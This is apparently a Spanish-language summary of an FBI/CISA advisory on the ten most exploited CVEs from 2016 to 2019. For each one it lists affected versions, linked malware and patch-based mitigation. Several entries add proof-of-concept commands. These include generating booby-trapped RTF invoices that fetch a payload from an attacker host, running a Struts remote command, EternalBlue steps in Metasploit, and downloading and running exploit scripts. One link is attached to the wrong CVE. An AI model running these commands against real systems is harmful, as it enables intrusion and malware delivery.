FBI | CISA: TOP 10 de CVE más explotados.
Dos de las agencias mas importantes en el ámbito de la seguridad en Estado Unidos, publicaron un top 10 de las vulnerabilidades de software mas utilizadas a lo largo de los últimos 4 años entre 2016 y 2019.
El reporte emitido por las autoridades del Departamento de seguridad Informática Homeland y Agencia de seguridad de infraestructura (DHS CISA) y la Oficina de Investigación Federal (FBI) impulsa a las organizaciones en el sector publico y privado a aplicar las actualizaciones necesarias in orden para prevenir las mas comunes formas de ataque encontradas al día de hoy.
Top 10 – CVE:
CVE-2017-11882( Microsoft Office):
Versiones vulnerable:2007 SP3/2010 SP2/2013 SP1/2016
Malware asociado: Loki,FormBook,Pony/FAREIT.
[+]Cómo se mitiga:
Este fallo de seguridad solo se es necesario actualizar a la versión mas actual de tu producto.
CVE-2017-0199(Microsoft Office):
Versiones vulnerables:2007 SP3/2010 SP2/2013 SP1/2016, VistaSP2,Server 2008 SP2,Windows 7 SP1, Windows 8.1
[+]Cómo se mitiga:
Actualización de seguridad de tus productos.
[+]Prueba de concepto:
La victima se le envia un archivo con una importacion de una rchivo rtf, en el momento que el cliente pide el archivo rtf a el atacantese devuelbe un hta a lo cual microsoft es vulnerable y lo ejecuta.
x|python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
CVE-2017-5638(Apache Struts):
Versiones vulnerables: 2.2.3.x antes de 2.3.32 y 2.5 antes de 2.5.10.1.
[+]Cómo se mitiga: Actualizar a Struts 2.3.32 o Struts 2.5.10.1.
[+]Prueba de concepto:
Para hacer uso de esta prueba de concepto, solo es necesario la url del host, seguido del comando a ejecutar.
python exploit.py http://ip:8080/hello "ls -l"
CVE-2012-0158(Microsoft Products):
Versiones vulnerables: Microsoft Office 2003 SP3, 2007 SP2 , SP3, 2010 Gold ,SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, 2008 SP2, SP3, R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, 2009 Gold R2; Visual FoxPro 8.0 SP1 9.0 SP2; Visual Basic 6.0.
CVE-2019-0604(Microsoft SharePoint):
Versión vulnerable: Microsoft SharePoint.
Virus asociados: China Choper.
[+]Cómo se mitiga:
Actualizar parches de seguridad del producto.
[+]Prueba de concepto:
Esta vulnerabilidad ya cuenta con un exploit en Metasploit:
https://github.com/CCrashBandicot/helpful/blob/master/CVE-2012-0158.rb
CVE-2017-0143(Windows O.S):
Versiones vulnerables: Microsoft Windows Vista SP2; Windows Server 2008 SP2 , R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold, R2; Windows RT 8.1; Windows 10 Gold, 1511, 1607; Windows Server 2016.
Virus asociados:
Eternal Synergy y EternalBlue Exploit Kit.
[+]Cómo se mitiga:
Actualizando los equipos afectados por estas vulnerabilidades.
[+]Prueba de concepto:
Para esta vulnerabilidad ya contamos con un modulo en metasploit, no hace falta explicar mucho de este ya que fue bastante conocido y lleva 3 años, aun a si existen actualmente una gran cantidad de equipos vulnerables.
msfconsole msf>use exploit/windows/smb/eternalblue_doublepulsar msf>set rhost ip msf>exploit
CVE-2018-4878(adobe flash player):
Versiones vulnerables: versiones anteriores a 28.0.0.16.
Virus asociados:DOGCALL
[+]Cómo se mitiga:
Actualizando Falsh player a la ultima versión.
[+]Prueba de concepto:
Para explotar esta vulnerabilidad se ejecuta un código basado en python que contiene un payload que nos permitirá infectar el equipo remoto que acceda a nuestro servicio web.
wget https://raw.githubusercontent.com/SyFi/CVE-2018-4878/master/Flashp0c.py python ./Flashp0c.py
CVE-2017-8759(.Net Framework):
Versiones vulnerables: 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 y 4.7.
Virus asociados:
FINDSPY,FinFisher,WingBird.
[+]Cómo se mitiga:
Actualizando los últimos parches de seguridad.
[+]Prueba de concepto:
La forma de explotar esta vulnerabilidad es muy parecida al CVE-2017-11882, se basa en la importación de archivos RTF.
wget https://raw.githubusercontent.com/bhdresh/CVE-2017-8759/master/cve-2017-8759_toolkit.py python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
CVE-2015-1641(Microsoft Products):
Versiones vulnerables: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1
Virus asociado: Toshliph, UWarrior
[+]Como se mitiga:
Actualizar todos los productos de Microsoft a sus últimos parches de seguridad.
[+]Prueba de concepto:
Esta falla se basa en un fallo en la corrupción de memoria presentado en una liberia de MS Office si deseas verlo mas a fondo puedes visitar este sitio.
CVE-2018-7600(Drupal):
Versiones vulnerables: Anteriores a 7.58, 8.x Anterior a 8.3.9, 8.4.x Anterior a 8.4.6 , 8.5.x y anterior a 8.5.1.
[+]Como se mitiga:
Actualizando a la version mas actual del framework.
[+]Prueba de concepto:
Para la explotación de esta vulnerabilidad es necesario editar el archivo python en la sección “your traget here” y al ejecutar el código te dirá si es vulnerable, este mismo código puede ser utilizado para inyectar un payload.
https://raw.githubusercontent.com/r3dxpl0it/CVE-2018-7600/master/payload.py
Información extraída de Top 10 Routinely Exploited Vulnerabilities , Información de National Cyber Awareness System ( us-cert.gov/ncas ).
